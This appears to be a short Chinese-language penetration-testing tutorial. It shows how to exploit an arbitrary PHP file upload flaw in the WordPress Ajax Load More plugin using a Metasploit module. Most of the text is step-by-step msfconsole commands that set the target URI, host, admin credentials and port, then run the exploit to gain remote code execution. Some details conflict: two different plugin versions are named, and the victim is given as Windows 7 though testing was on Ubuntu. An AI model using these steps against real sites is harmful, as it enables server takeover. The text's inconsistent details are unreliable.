渗透测试实战教程:如何利用WordPress的Ajax插件的文件上传漏洞进行多文件上传(文件上传漏洞)

此模块利用WordPress Ajax Load更多版本2.8.1.1中的任意文件上传漏洞。它允许上传任意php文件并获得远程代码执行。
在Ubuntu 12.04 / 14.04服务器上使用WordPress 4.1.3对WordPress Ajax加载更多2.8.0进行了成功测试。
利用目标
WordPress Ajax加载更多2.8.0
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
如何利用WordPress的Ajax插件的文件上传漏洞进行多文件上传
现在输入  exploit use / unix / webapp / wp_ ajax_load_more_file_upload
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set targeturi /wordpress
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set rhost 192.168.0.110 (远程主机的ip)
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_username admin
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_password admin123
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set rport 80
msf exploit (wp_ajax­­­­­_load_more_file_upload)>exploit
如何利用WordPress的Ajax插件的文件上传漏洞进行多文件上传
转载请注明本文链接: http://www.mayidui.net/t2315.html
游客
登录后才可以回帖,登录 或者 注册